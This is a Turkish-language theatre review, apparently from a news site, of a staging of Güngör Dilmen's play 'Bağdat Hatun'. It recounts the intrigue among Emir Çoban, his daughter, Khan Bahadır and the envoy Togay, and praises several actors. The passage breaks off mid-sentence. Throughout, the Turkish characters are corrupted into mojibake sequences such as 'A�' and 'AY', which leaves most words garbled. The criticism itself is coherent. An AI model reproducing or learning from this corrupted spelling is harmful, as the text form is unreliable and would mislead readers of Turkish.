23 Şubat 2019, Cumartesi
SON HABERLER
Buradasınız: Anasayfa / Eleştiri / BaAYdat Hatun
BaAYdat Hatun

BaAYdat Hatun

Horasana�� Emir A�obana��A�n konaAYA�.

DA�rtnala gelen bir at. SA?rA?cA?sA? Togay, hA�AYA�mla Emir A�obana��A�n odasA�na dalmak ister. A�ki nA�betA�i A�nA?nA? keser. Togay, Emir A�obana��A�n eski emir subayA�dA�r. GA?ngA�r Dilmen, Oa��nu, zayA�f, ufak tefek bir MoAYol olarak dA?AYA?nmA?AYtA?r, A�A?nkA? Togay, BaAYdat Hatuna��a A?AYA�k olmuAY, aAYkA�nA� yazdA�AYA� mektuplarla aA�A�klamA�AY, BaAYdat Hatun tarafA�ndan reddedilmiAYtir. Fiziksel gA�rA?nA?AYA? bu nedenle A�nemli. A�elimsiz, bakA�lA�nca itici biri olmalA�ydA�. Oyunda ise Togay, Evren Sertera��in kiAYiliAYinde, uzun boylu, yapA�lA�, gA�steriAYlia�� A�yi ki de olmuAY. Evren Serter, Togay rolA?nde A�ok baAYarA�lA�.

A�A�A�A�A� Togay, atA�nA�, aceleyle baAYkent Sultaniyea��den sA?rA?p gelmiAYtir, Sultan katA�ndan. Birinci askerin konuAYmasA�, Togaya��A�n kimliAYini hemen aA�A�k eder. a�?Fazla dalaAYmayalA�m, Togaya��dA�r bu. Azimdi de Hakana��A�n kapA�kulu. Kimi ne zaman nasA�l A�sA�racaAYA� belli olmaza�?. Hakan BahadA�r Hana��A�n A�zel elA�isi olarak gelmiAYtir konaAYa. Hem Emir A�oban ile hem BaAYdat Hatun ile gA�rA?lecek eski bir hesabA� vardA�r. Acelesi bundandA�r. HesabA� gA�rmeye bir an A�nce baAYlamak ister. Bu nedenle, damat Hasana��A�n da gelmesini ister. SA�yleyeceklerini Oa��nun da iAYitmesi gerektira��

A�A�A�A�A�A� Emir A�oban, yaAYlA� ama dinA�, soylu gA�rA?nA?AYlA? bir vezirdir. Togaya��A� yakA�ndan tanA�dA�AYA� iA�in gelmesini pek hayra yormaz. Onun iA�in ilk lafA� a�?AyaAYA�n uAYurlu olsun, Togaya�? olur. Togaya��A�n imalA� imalA� konuAYmasA�, lafA�nA� dolaAYtA�rmasA� Oa��nu sinirlendirir. Hakana��A�n buyruAYunu bir an A�nce A�AYrenmek ister. Togay a�?BahadA�r Han, kA�zA�nA�z BaAYdat Hatuna��u ister, Emir A�obana�? deyince, yaAYlA� vezir ve Hasan AYoka girer. Togay, zamanA�nda BaAYdat Hatuna��u elde edemediAYinden bu isteAYi iAYneliye iAYneliye sA�ylera�� Hasana��a gA�re A�lA?mA? A�oktan hak etmiAYtir Togay, fakat bir elA�i olmasA� Oa��nu dokunulmaz kA�lar. Emir A�oban, karAYA� A�A�kar. KA�zA� BaAYdat, kocadadA�r. DamadA� Emir Hasana��dA�r. Togay, bastA�rA�r. Emir A�oban eAYer bu evliliAYe rA�za gA�sterirse, devlete baAYlA�lA�AYA�nA� kanA�tlayacaAYA�nA� sA�yler. HinoAYlu hin, Emir A�obana��A�n aA�A�AYA�nA� aramakta.

A�A�A�A�A� Emir A�oban, bu devleti uAYraAYA�nda yaAYlanmA�AYtA�r. SA�nA�r boylarA�nda bir bir dA?AYmanlarA�nA� sindirmiAYtir. Bundan iyi kanA�t mA� olur devlete baAYlA�lA�AYA� iA�in? Hatta, Anadolua��da baAY kaldA�rmaya kalkan A�z oAYlu TimurtaAYa��A� zincirleyip BahadA�ra��A�n A�nA?ne getiren kendisidir. Togay bu, altta kalA�r mA�? Hemen cevabA� yapA�AYtA�rA�r.a�?HiA� suA�u yokmuAY gibi, bir gA?lA?msemeyle baAYA�AYlayA�verdi, TimurtaAYa��A�a�? der.a�?ArtA�k bilmem asA�l nedenini bu kolay baAYA�AYlamanA�na�?. Bu laf sokuAYlar, Togaya��A�n alaysA� davranA�AYlarA� Emir A�obana��A� gerer, sinirlendirir. A�A�ten iA�e geliAYen A�atA�AYma dA�AYa vurmaya baAYlar aralarA�nda. KA�yA�ya A�ekilen Hasan da sinirlenmiAYtir. Togay, dilinin altA�ndaki baklayA� A�A�kartA�r. a�?KA�zmayA�n canA�m, belki de BaAYdat Hatuna��un etkisi olmuAYtur. O gA?n o da girmedi mi otaAYa, hiA� beklenmedik bir anda. KapanmadA� mA� BahadA�ra��A�n ayaAYA�na?a�? Togaya��A�n bu lafA� aksiyonu ateAYler, olayA� geliAYtirmeye baAYlar. AnlA�yoruz ki, BahadA�r, BaAYdat Hatuna��dan bu davranA�AYA� sA�rasA�nda A�ok etkilenmiAY, BaAYdat Hatun ile evlenme kararA� vermesine bu olay neden olmuAYtur. Togay, alaysA�, Emir A�obana��A�n A?stA?ne A?stA?ne gider. A�stediAYi kadar kA�zsA�n a�?yetera�? desina��a�?Hakan kaldA�rmadA� mA� onu yerden eliyle okAYayarak yanaklarA�nA�? Silmedi mi A�lA�k gA�z yaAYlarA�nA�? Uzun uzun bakmadA� mA� karaca gA�zlerine?a�? Hasan, bir koca olarak A�A�ldA�rmA�AYtA�r vezir onu durdurur. (Burada Hasana��A� oynayan oyuncu A?mit Dikmen bu sinirliliAYi vermede A�ok baAYarA�lA�ydA�.)

A�A�A�A�A�A� Togay bastA�rA�r. a�?BahadA�ra��A�n buyruAYu bizim iA�in dilektir, diyen, sen deAYil misin?a�? Emir A�oban, direnir.a�?Aile AYerefimizi hiA�e sayan, bizi aAYaAYA�layan bir dilek deAYilse, evet, buyruktur Hakana��A�n dileAYi. Ancak, Hakana��A�n da sA�nA�rlarA� vara�?. Emir A�oban, karAYA� A�A�kA�AYA�nda sinirlerine hakim olmaya A�alA�AYA�r. (A�fkesini bastA�rmada veziri oynayan oyuncu Arif Yavuz, gayet iyi) KarAYA� A�A�kA�AYA�nA� bir nedene baAYlamalA�dA�r. Kocada olan kA�zA�nA� istemekle hakan, hakanlA�k sA�nA�rA�nA� aAYmA�yor mu? Togay, cin. Der ki: a�?Yasalara gA�re hayA�r, Cengiz hana��A�n yasalarA�na gA�re, Hakan A?lkede gA�nlA?nA?n beAYendiAYi her kadA�nA� alabilir, evliyse kocasA�ndan A�ekip alabilira�?. Vay vay vay! Ne yasa ama! Hasan der ki: a�?MoAYola��da A�rana��da kA�z mA� kalmadA�? BahadA�r Hana��A�n evli, namuslu bir kadA�nA� istemesi yakA�AYA�k alA�r mA�?a�?. Namusu belada. Namusunu kurtarmaya A�alA�AYmakta. KA�r bir kuyuya dA?AYtA?AYA?nA?n farkA�nda. A�A�k A�A�kabilirse. Giderek A�aresizliAYe itildiAYinin farkA�nda. (Oyuncu bunu A�ok iyi yansA�tmakta) Togay ise onun bu dA?AYtA?AYA? durumu gA�rA?nce zevkten dA�rt kA�AYe. Oyununu istediAYi gibi oynamakta, intikamA�nA� almakta.(Evren Serter bunu yansA�tmakta A�ok baAYarA�lA� bu sahnede) Togay, A?stA?ne A?stA?ne gitmeye devam eder:a�? GA�zA? baAYka kadA�n gA�rmA?yor kia�?. Emir A�oban, sakin kalmaya A�alA�AYA�r. Togaya��a gidip hakana��a bu iAYten vazgeA�mesini, sA�ylemesini ister. a�?BA�yle uAYursuz sevgilerden kimseye hayA�r gelmez. GenA�tir, bir baAYkasA�nA� gA�rA?p beAYenir, bu olmayacak hevesten vazgeA�sin. Unutmaya A�alA�AYsA�n kA�zA�mA�. Biz de onun bu A�arpA�k tutkusunu hiA� iAYitmemiAY olalA�m. YarA�n yola A�A�karsA�n. Sevgilerimi ve armaAYanlarA�mA� iletirsin BahadA�ra��aa�?. Togay, inatA�A�, A�srarcA�. a�?Oa��nun tek beklediAYi kA�zA�n Emir A�oban, kA�zA�n. Cengiz yasalarA� yA?rA?yegelmiAY, MoAYola��a A�lA�A? olmuAY, sen AYimdi bozar mA�sA�n?a�?. A�oban, o an aklA�na gelen fikirle saldA�rA�ya geA�er: a�?Sus dedim, rezil, bu yasalara bile aykA�rA� BahadA�ra��A�n dileAYi, Evli kadA�nA�n A�ocuAYu varsa Oa��na Hakan dahi iliAYemez. BA�yle sA�ylA?yor iAYte bu gA?vendiAYiniz eski yasalara�?. Bu buluAY A�obana��A� rahatlatA�r. Togay, AYaAYA�rA�r. Azeyh Hasan, AYaAYA�rA�ra�� A�oban, bakA�AYlarA�yla Hasana��A� susturur. SA�ylemesi gereken esaslA� lafA� sA�ylemiAYtir. Togaya��A� kovalar. Kovalanmak AYaAYkA�nlA�AYA�nA� arttA�rdA�AYA� gibi A�fkelendirir Togaya��A�a�� Burada, yaratA�lan yeni bir durumla dA?AYA?m atA�lA�r. Azimdi ne olacak? Merak edilmeye baAYlanA�r.

A�A�A�A�A�A� A�oban, Togaya��A�n A?stA?ne A?stA?ne gider, Tehdit eder. Kendini gA?A�lA? hissetmeye baAYlar, Togaya��A� ezmek ister. Togay, zamanA�nda bir mektupla kA�zA�nA� istemiAYtir. Gitmezse, kellesini kesip bu mektupla BahadA�ra��a yollayacaAYA�nA� sA�yler. a�?Sana vermediAYim kA�zA�mA� AYimdi BahadA�ra��a mA� alacaksA�n deyyus?a�? der, iAYi hakarete vardA�rA�r. Togaya��A�n kA�zA�nA� BahadA�ra��a isteyiAYiyle intikam almak istediAYinin farkA�na varmA�AYtA�r. Oa��na hiA� gA?venmediAYini aA�A�klar. Togay, hakanA� bu kararA�ndan caydA�rmaya A�alA�AYacaAYA�nA� sA�yleyerek, A�A�kar.

Togaya��A�n ardA�ndan BaAYdat Hatun, Emir A�obana��A�n yanA�na gA?lA?mseyerek gelir. Bu gA?lA?msemesi babasA�na duyduAYu sevginin AYahidi gibidir. (Hande GA?lera��in bu ifadeyi vermede tavrA� A�ok iyi) Oa��nu Hasan yollamA�AYtA�r babasA�nA�n yanA�na. A�oban Oa��na a�?Azimdi, yeminle, senin temiz evlilik mutluluAYuna, kadA�nlA�k AYerefine gA�lge dA?AYA?rmeyeceAYim. Bu A�arpA�k yasalar nereden, hangi eski ulu hakandan gelirse gelsin, karAYA� duracaAYA�m, yeminlea�?. BaAYdat Hatun, A�ocukluAYunda evcilik oynamamA�AYtA�r hiA�. Emir A�oban, kA�zA�ndan bir A�ocuk ister, AYefkatli, yalvarA�r gibi. Hamile kalA�rsa yalancA� olmayacaAYA� gibi kendini aklayarak temize A�A�karmA�AY olacak. AynA� zamanda BahadA�ra��a karAYA� Oa��nu korumuAY olacaktA�r. BaAYdat, bilinmeyeni aA�A�klar hemen: Hamiledir. Yeni bir durum. A�oban, AYaAYA�rA�r, sevinir. Hele bA�yle bir gA?nde! Bunu daha A�nceden bilmiAY olmasA� gerekirdi. LafA�nda azar vardA�r. BaAYdat, lafA� hemen yakalar. Bir AYey sezinlemiAYtir, A?stA?ne gider, A�oban lafA� deAYiAYtirmek istese dea��

A�A�A�A�A�A� BahadA�r, BaAYdata��A� ilk ne zaman, nerede gA�rmA?AYtA?r? BilindiAYi gibi TimurtaAYa��A� kurtarmak iA�in otaAYa girdiAYinde mi? A�ncesi yok mu? A�oban, kA�zA�ndan AYA?phelenmektea�� GA�zA?nden kaA�an bir AYey varsa eAYer A�AYrenmek ister. BaAYdat da meraklA�. BabasA� geA�miAYini niye deAYmektedir? Azimdi, Togaya��A�n kendisiyle ilgili bir sA�z taAYA�dA�AYA�ndan artA�k emindir. AA�A�klama yapA�lmadA�AYA� iA�in BaAYdat kaygA�lanmaya baAYlamA�AYtA�r. Bir kaA�A�p kovalamaca baAYlar BaAYdat Hatun ile babasA� arasA�nda. Baba, AYefkatinden, kA�zA� o sevecenliAYinden, gA?lA?msemesinden uzaklaAYA�r. BabasA�na lA?yA�k bir evlat olma isteAYinin tek kaygA�sA� olduAYunu aA�A�klar, BaAYdat. Acaba? BabasA�nA�n saygA�nlA�AYA�na gA�lge dA?AYA?ren olmayacaktA�r.

Emir A�oban, dA?AYA?ncelidir. Neden BahadA�r, hiA� suA�u yokmuAY gibi TimurtaAYa��A� baAYA�AYlamA�AYtA�r? BaAYdat ile aralarA�nda A�ncesinden bir AYey olduAYu iA�in mi? AzA?phelia�� Bu AYA?phe onu A?zA?ntA?ye gA�tA?rmektedir. BaAYdat, anlamA�AYtA�r. BahadA�ra��dan gelen haber, kendisiyle ilgilidir, kesin. Yeni bir durum. Bu durumla bir dA?AYA?m daha atA�lA�r.

BaAYdat Hatun, ilk anda, BahadA�ra��A�n kardeAY sevgisini yanlA�AY yorumlayA�AYA�na kA�zar. Namuslu, evli bir kadA�na odalA�k gibi bakmasA�na gA?ya bozulmuAYtur. Ece olacaAYA� iA�ten iA�e onu sevindirir, fakat renk vermemeye A�alA�AYA�r. a�?Evli bir kadA�n iA�in en bA?yA?k ikbal, en bA?yA?k saltanat eAYinin kanadA� altA�ndadA�r ancaka�? deyiAYiyle babasA�nA�n gA�nlA?nA? rahatlatA�r kurnazca, AYA?phelerini ortadan kaldA�rA�r. Sormadan da geri durmaz: a�?BahadA�ra��A�n elA�isi Togaya��a ne sA�ylediniz?a�?. A�steAYi Uygun bir dille geri A�evirdiAYini sA�yler, Emir A�oban.

A�A�A�A�A�A� Hasana��A�n gelmesi, Emir A�obana��A� kA�zA�nA�n sorularA�ndan kurtarmA�AYtA�r. DamadA�, BaAYdat Hatun ile gurur duymalA�dA�r, bA�yle bir kadA�nA�n efendisi olduAYu iA�in. MA?jdeyi karA�sA�nA�n aAYzA�ndan duymalA�dA�r. A�A�kar, karA� kocayA� baAY baAYa bA�rakA�r. a�?YakA�nda baba oluyorsun Azeyh Hasana�? der, BaAYdat Hatun. Bu muAYtu A�yle bir saatte gelir ki vA?cudundan geA�en sevinA� titreAYimini ikiye katlar ve ilk kez BaAYdat Hatun kocasA�na sevgilim, der. Onu arka arkaya AYaAYA�rtan ikinci durum.

Bir at kiAYnemesia�� BaAYdat, pencereye doAYru bakar, yA?zA?nde bir A�AYA�ma. AtA�n sA?rA?cA?sA?ne ilgi duyduAYunun iAYaretidir bu, ancak kocasA�na yalancA� baAYlA�lA�AYA�nA� kanA�tlamak iA�in atlA�dan AYikayetA�i olur. At sA?rA?cA?sA? Arpa denen yiAYittir. Arpa, oyunda A�nemli bir yeri olan kiAYiliktir ve adA�nA� ilk kez burada duyarA�z. Yeni bir durum.Bir dA?AYA?m daha atA�lA�r. Hasan erkekliAYini gA�stermek, iki de bir gelip pencere altA�nda atA�nA� AYahlandA�ran yiAYitten hesap sormak ister. BaAYdata��a gA�re kocasA� bA�yle davranarak ona olan saygA�sA�nA� kanA�tlamA�AYtA�ra�� Bu bir sA�nama. Bir A�lA�A? A�A�karma. KocasA� ilerde BahadA�ra��a karAYA� da aynA� erkeklik gA�sterisini yapabilecek mi acaba? Belki de o an aklA�na geldi hemen oyun kurdu Arpaa��nA�n pencere altA�ndan geA�iAYinden yararlandA�. Olamaz mA�? A�ki yA?zlA?. (Oyuncu hande GA?rler, bu ikiyA?zlA?lA?AYA?, deAYiAYimi, sevinA�ten A�fkeye geA�iAYi iyi verdi. Azeyh Hasana��A� oynayan A?mit Dikmen de erkeklik gA�sterisinde iyiydi)

A�A�A�A�A�A� Belki bana A�yle geldi, belki gA?naha giriyoruz diyerek Hasana��A� durdurur ve sorar:a�?Hakana karAYA� AYerefimizi korumak iA�in ne yaparsA�nA�z?a�? Aile AYerefini onarmak iA�in ne dA?AYA?nA?r? BahadA�r Hana��dan hesap sormayacak mA�dA�r? Bu sorularla kocasA�nA�n BahadA�ra��a karAYA� tutumunun nasA�l olacaAYA�nA� sA�namaktadA�r. BahadA�r, bir handA�r, A?lkenin hakimidir. Oa��na karAYA� A�A�kabilecek midir? Hasan, karA�sA�nA�n tavrA� karAYA�sA�nda A�aresizliAYe dA?AYer. BaAYdat, kocasA�na karAYA� tavrA�yla acA�masA�zdA�r. (Bu zalimlik ve A�aresizlik oyuncular tarafA�ndan iyi verildi) BaAYdat, alaysA� tavra geA�erek kocasA�nA� kA?A�A?msemeye baAYlar. Burada biz BaAYdat Hatuna��un BahadA�ra��A�n yoluna doAYru adA�m atmaya niyetlendiAYini anlarA�z. Yeni bir durum.Yeni bir yA�neliAY. SuA�lar kocasA�nA�: a�?KadA�nlA�AYA�mA�za gA�z koyan Hakan deAYil de bir Arpa yiAYit oldu mu aslan kesiliyorsun. Sizin yA?reAYinizde ikili bir A�lA�A? var. Hakana��a ayrA� bir beye ayrA� tartA�yorsunuz aile AYerefinia�?. Hasan: a�?Benden ne istiyorsun?a�? diyebilir, sadece.

BaAYdat, nA�betA�ilere seslenir, Togaya��A� getirmelerini ister. Bir A�ift sA�zA? vardA�r Togaya��a onun da sA�yleyeceAYi. Hasana�? baban en uygun yanA�tA� verdia�? deyip caydA�rmaya A�alA�AYA�r. Der ki a�?babamA�n en uygun sandA�AYA� yanA�t benim iA�in en uygun olmayabilira�?. Demek ki, yeri geldiAYinde ne kocasA�nA� ne de babasA�nA� ipleyecektir. Hasan, alttan alA�r, BaAYdata��A� gA?zelliAYinden dolayA� A�verken, ondan, Hakana��A� kA�zdA�racak laf sA�ylemesini ister ve A�A�kar.

BaAYdat hatun ile Togay karAYA� karAYA�ya kalA�r. Togay, kurnaz. Hemen Ecem der BaAYdata��a, ruhunu okAYayA�cA� biA�imde. BabasA�nA�n araya girmesi iAYleri bozmuAYtur. a�?Babam araya girmese Hasana��A�n hanA�eri yA?reAYini bulacakmA�AYa�? der, BaAYdat. AlaysA� biA�imde yalanlar, Togay. BaAYdat, sinirlenir. KocasA�yla alay edilmesini istemez. Hasan ile evlenmesi alA�n yazA�sA�dA�r. Yeni bir durum. Bunu sA�ylerken Hasana��la istemeden evlendiAYini anlarA�z. Onunla vakitsiz evlenmiAYtir. Tekste de zayA�f kalan yanlardan biri de burasA�, yani BaAYdata��A�n Azeyh Hasan ile neden, nasA�l evlendiAYidir. Tarih, Azeyh Hasana��A� hatA�rA� sayA�lA�r biri olarak gA�sterir gA�stermesine ama bu bilgi kA�rA�ntA�sA� oyun yazA�mA�nda yeterli deAYildir. Kurmaca iA�inde iAYlenmesi gerekirdi.

A�A�A�A�A�A� BaAYdat Hatun, Togaya��dan, BahadA�ra��A�n nasA�l bir insan olduAYunu A�AYrenmeye A�alA�AYA�r, Oa��nu da sA�zleriyle tavlamayA� unutmadan. a�?Sen anlarsA�n insan ruhundan. Bana yazdA�AYA�n mektuplarda ilginA� gA�zlemler vardA�a�?. Azu iAYe bakA�n, geA�miAYte tu kaka edilen mektuplar AYimdi gA�klere A�A�karA�lmakta. A�A�kar sA�z konusu olunca insan kustuAYunu yalayA�p yutuyor. Bu mektuplarA� yazdA� diye dA�AYlanan, dA�AYlayanA�n gA�zdesi oluyora�� a�?Dilerse BahadA�r unutsun benia�? derken BaAYdata��A�n aA�A�k kapA� bA�raktA�AYA�nA� anlar Togay. a�?TA�reler yasalar elverse bile, babam, kardeAYlerim engellera�? der demesine, yine de kA?A�A?k bir hanA�erle, saA�A�ndan kestiAYi bir tutam saA�A� BahadA�ra��a yollar. Bu, BahadA�r iA�in bir umuttur. Yeni bir durum. Bir dA?AYA?m daha atA�lA�r burada. Olay geliAYmektedir. Serim bA�lA?mA? bitmiAYtir. BaAYdata��A�n bu tavrA� karAYA�sA�nda bakalA�m BahadA�r ne yapacaktA�r? BaAYdat Hatun boAY duracak mA�dA�r? Ecelik, iktidar sA�z konusu. Oraya ulaAYabilecek mi?

Sultaniyea�� BahadA�r Hana��A�n sarayA�. BahadA�r Hana��A� gA�rA?rA?z. 25 yaAYA�nda, yakA�AYA�klA�. Sedire uzanmA�AY. Togay, yanA�ndadA�r. Olmazla olur arasA� ettiAYi laflar BaAYdata��A�n, BahadA�ra��A�n beynini yA�kamaktadA�r. Bu laflar Togaya��a gA�re yarA�m aA�A�k bA�rakA�lmA�AY kapA�dA�r. BahadA�r, yokluktan hep BaAYdat yaratmaktadA�r. Bu bir iAYkencedir onun iA�in. BaAYdat, babasA�nA�n tutumu nedeniyle aA�A�kA�a evet diyemezdi. Sonra, hemen a�?eveta�? deseydi deAYeri dA?AYerdi BahadA�ra��A�n gA�zA?nde. BahadA�r, hasta gibidir. Bu sayrA�lA�AYA�n hekimi BaAYdata��tA�r, ondan kolay kolay vazgeA�meyecektir. BaAYdata��A�n TimurtaAYa��A� baAYA�AYlatmasA� iA�in iA�eri girmesi dA?AYA?ndA?rtA?r onu. Bu bir oyun mudur? Beklenmedik, kendiliAYinden duygusu veren bir oyuna�� TA?m A�obangillerin yapmadA�AYA�, sadece BaAYdata��A�n planladA�AYA�. Tedirginlik var, A�A�zA?m arayA�AYA�, sA�ylenen sA�zlerin tartA�lmasA�, BaAYdata��A�n davranA�AYA�nA�n A�A�zA?mleniAYia�� BaAYdata��A�n sA�zlerinin yeni uA�lar vermesini bekleyeceklerdir. Yeni bir durum. Bir dA?AYA?m daha atA�lA�r.

Horasana�� KadA�nlar arasA�nda bir koAYuAYturma. Haremde neler oluyor? Emir A�oban, merak iA�indea�� Neden bir AYey sA�ylemeyip ters yA�ne kaA�A�p gitmekteler? Hasana��A� da odaya sokmazlar. BaAYdat Hatun A�ocuAYunu dA?AYA?rmA?AYtA?r. Yeni bir durum, yeni bir dA?AYA?m. BaAYdat hatun, BahadA�ra��a giden yolda ilk hamleyi yapmA�AYtA�r. Ebeyi iterek kendi elleriyle A�ekip A�A�karA�r cenini. A�ktidara giden yolda onun iA�in her yol mubaha�� A�ocuAYunun katili bile oluyor.

A�A�A�A�A�A� Bu yeni durum, A�neriyi tekrarlama hakkA�nA� vermiAYtir BahadA�ra��a. Derdini aA�mak iA�in bu sefer kendi gelmiAYtir Emir A�obana��A�n yanA�na. Buraya onu A?zmek iA�in gelmemiAYtir. 13 yaAYA�nda tahta A�A�karken Oa��na Emir A�oban kol kanat germiAYtir. ZamanA�nda a�?hakan istemesini bilmeli ve bir kez istedi mi koparA�p alabilmeli, adalet iA�rea�? demiAYtir, hatA�rlatA�r, bu sA�zA? A�rnek gA�stererek. BaAYdat Hatuna��u hem babasA�ndan hem de kocasA�ndan istemektedir. A�oban, yasak duygularA�nA� dizginlemesini ister BahadA�ra��dan. Unut onu, der. BaAYdata��A�n gA�nlA? olmadan bu iAY nasA�l olur? BahadA�r, a�?belki de onun da gA�nlA? var, kim bilira�? dera�� A�oban, kA�zA�na gA?venmektedir. BahadA�ra��A�n tutkusuna karAYA�lA�k vermeyeceAYine emindir. KarAYA�lA�k verirse onun yaAYamA�na son vermek babasA� olarak ona, kocasA� olarak Azeyh Hasana��a dA?AYer. Ne var ki, koca vezir, ne doAYru dA?rA?st kA�zA�nA� ne de damadA�nA� tanA�maktadA�r. Onlara gA?venip inanmakta yanA�lgA� iA�indedir. Gerekirse, A�oban, BahadA�ra��dan atalarA�nA�n verdiAYi gA�revleri bir bir almasA�nA� ister. Yeter ki, BahadA�r onlarA� ve kA�zA�nA� rahat bA�raksA�n. Cengiz Hana��A�n yasalarA� geA�erlidir BahadA�r iA�ina�� Yeni bir durum ve atA�lan yeni bir dA?AYA?m. KonuAYmalarA� boyunca A�oban, her AYeyi gA�ze alarak, hA?kA?mdar karAYA�sA�nda baAYA�nA� dik tutmaya A�alA�AYA�r. HA?kA?mdarA�n isteAYini boyun eAYerek kabul etmek istemez. BahadA�r ise hA?kA?mdarlA�AYA�nA�, her AYeyi rahatlA�kla yapabileceAYini, isteAYinden vazgeA�meyeceAYini, hissettirir. A�obangillerin kararA� da kesindir. Ne olursa olsun direneceklerdir bu A�neriye karAYA�a��

BahadA�r gider. A�aAYrA�lmadan, nelerin olup bittiAYini A�AYrenmek iA�in babasA�nA�n yanA�na gelir, BaAYdat Hatuna�� KardeAYleri girer. BaAYdat, onlarla kucaklaAYA�r. A�oban, A�nlerinde diz A�A�kmesini ister BaAYdata��tan. Yedi kardeAY, kA�lA�A�larA� BaAYdata��A�n baAYA� A?stA?nde, kardeAYlerinin namusunu korumak iA�in ant iA�erlera�� BaAYdat, bu a�?anta�?A� geri almalarA�nA� ister. Kendi namusunu kendi koruyacaktA�ra�� KardeAYleri A�A�kA�nca o da gA�z diktiAYi ecelik yolunda kardeAYlerinden vazgeA�eceAYi iA�in ant iA�era�� Yeni bir durum ve atA�lan dA?AYA?ma��

Ebe, Kama��A� sA?rA?kleyerek BaAYdata��A�n yanA�na getirir. Ebe, bu kadA�nA� A�ocuAYu dA?AYsA?n diye bA?yA? yaptA�AYA� iA�in BaAYdat Hatuna��un yanA�na getirmiAYtir. A?stA?nde tartA�AYA�lmasA� gereken A�nemli noktalardan birisi burasA�. BaAYdat Hatuna��un ve diAYerlerinin, Emir A�obana��A�n, Azeyh Hasana��A�n gazabA�ndan kurtulmak iA�in bir ebe, bA�yle bir AYey yapabilir mi? Kama��A�, bir AYamanA� kolundan tutup BaAYdat hatuna��un A�nA?ne atabilir mi? A�yle bir ebe, bA�rak kolundan tutmayA�, bir AYamana dokunamaz bile. A?stA?nde kutsal sayA�lan bir kostA?m var. Giyilen herhangi bir kostA?me benzemez oa�� A�zenle dikilmiAYtir, A�A?nkA? kostA?m iA�inde ruhlarA� barA�ndA�ran bir nesnedir. Pek A�ok simgeyi, sembolA? iA�inde barA�ndA�rA�r. Bu simgeler ve semboller yeraltA�na inildiAYinde ona yardA�mcA� olacaktA�r. Bu kostA?mler, A�zellikle, insan vA?cudunu temsilen kemiklerle donatA�lmA�AYtA�r. Bu, yeniden doAYuAYa verdikleri A�nemden kaynaklanA�r. Kemiklerle yeniden yaAYama dA�nme gA?cA?ne sahip olur. Yine AYaman kostA?mA?nde hayvan figA?rleri bulunur, AYaman bunlarla konuAYup gA?A�lerinden yararlansA�n diyea�� KostA?me, ruhlarA� simgeleyen kuklalarA�n asA�lmasA� adettendir. Bu kA?A�A?k kuklalara kA?A�A?k cA?bbeler de giydirilira�� KA�tA? ruhlarA�n fA�sA�ltA�larA�nA� dinlemek iA�in kulak, ay, gA?neAY, yA�ldA�zlar, Erlik DA?nyasA�a��nda yaAYayan kurbaAYalar, yA�lanlar kostA?mde temsil olunur. Bunlar kumaAY veya madenden yapA�lmA�AY sA?sten ibarettir.

A�A�A�A�A� KostA?mA? Azamana��a saygA�nlA�k kazandA�rA�r. AynA� zamanda Azaman A�lA?mden korkmaza�� A�ldA?kten sonra A�bA?r tarafta da yaAYayacaAYA�na inanA�r o. Bu nedenle kam, BaAYdat Hatuna��un ayaklarA�na kapanmaz, Oa��na yalvarmaza�� GA?ngA�r Dilmen, bA�yle yazA�nca Kama��A� oynayan HA?lya SavaAY ne yapsA�n? Yerde de sA?rA?nA?r, yalvarA�r da, BaAYdat Hatuna��un eteklerini de A�pera��

BaAYdat Hatun, kadA�nA�, AYamanlA�k ve Erlik Han A?stA?ne sorguya A�eker. Erlik Han, yer altA� tanrA�sA�dA�r, kA�tA? ruhlarA�n tanrA�sA�a�� Kam, bunu yadsA�sa da BaAYdat Hatuna��un A�srarA� A?stA?ne Erlik Hana��a taptA�AYA�nA� kabul eder. BaAYdat, kadA�ndan, kendisini Erlik Hana��a ulaAYtA�rmasA�nA� ister. UlaAYacaAYA� tanrA�, yA?reAYinin karanlA�AYA�na denk olmalA�dA�r. Erlik Hana��A�n yardA�mA�yla yolunun A?stA?ndeki engellerden, babasA� ile kardeAYlerinden kurtulmak ister. Kam, sA�z verir. BaAYdat, bA?yA?cA?lA?AYe pek inanmaz ama kardeAYleri ve babasA� iA�in yapacaAYA� kA�tA?lA?klere kendisini inandA�rabileceAYi bir A�A�kA�AY noktasA�, bir destek aradA�AYA� iA�in Kama��dan medet umar. Bir yandan Kama��A� aAYaAYA�lar bir yandan Oa��na inanmaya A�alA�AYA�r.

A�A�A�A�A�A� BA?yA? tA�reni baAYlar. TA�ren sonrasA� BaAYdat Hatun, gA�AYsA?nden A�A�kardA�AYA� kA�rmA�zA� A�evreyi BahadA�ra��a ulaAYtA�rmasA� iA�in Kam ile yollar. Yeni bir durum ve atA�lan dA?AYA?m.

BahadA�r, zina iAYleyen bir kadA�nA� taAYlar. Bu, halkA�n iAYidir. BahadA�r, bir gA?nlA?AYA?ne halk olmak istemiAYtir. Zina hakkA�, Togaya��a gA�re yalnA�zca soylu kadA�nlara haktA�r. BahadA�r a�?BaAYdat Hatun gibi mi?a�? dera�� BaAYdat Hatuna��u kendisine A�ekmekle aynA� suA�u iAYlemiAY olmuyor mu? Vicdan azabA� A�ekmekte, fakat yine de BaAYdata��A� dA?AYA?nmekten kendini alamamaktadA�r. Togay, her zaman olduAYu gibi BahadA�ra��A� rahatlatma A�abasA�ndadA�r. Halk iA�in suA� olan eylem yA�neticiler iA�in bir hak olabilir. Halk, Togaya��a gA�re dediklerini yapmalA�, yaptA�klarA�nA� deAYila�� TA�reler halk iA�in ayrA� yA�neticiler iA�in ayrA�a��

A�A�A�A�A�A� BahadA�ra��A�n, BaAYdat Hatuna��un kardeAYlerinin iA�tiAYi anttan haberi olmuAYtur. Tehlike, sevdiAYi kadA�nA�n baAYA� A?stA?nedir. Bu Oa��nu, ikircikli hA?le getirmiAYtir. KararsA�zdA�ra�� TaAY attA�AYA� kadA�nA� A�rnek alA�p kendisini BaAYdat hatuna��dan uzak tutma kararA� alA�r. Togay, bu karara hemen karAYA� A�A�kar. HakanA�n merhamet, acA�ma duygularA�nA�n A�nA?ne Togay geA�er. AklA�nA� A�alar sA�zleriyle. Togay, kendine bile olduAYu gibi gA�rA?nmez. Erlik Hana��A�n yeryA?zA?ne A�A�kmA�AY hA?li gibidir. BahadA�ra��A�n kendi kendine hesaplaAYtA�AYA�nda, kA�tA?lA?k yapmaya yA�neltir. VicdanA�nA�n uyanmasA�na izin vermeza�� Emir A�obana��A� kA�tA?ler, gA�zA?nde kA?A�A?k dA?AYA?rmeye A�alA�AYA�r. Devlete baAYlA�, soylu, yA?ce bir insan gibi gA�rA?nA?r, ne var ki, devlet hizmetinde daha A�ok kendi yapA�sA�nA� kurmuAYtur. Emir A�obana��a 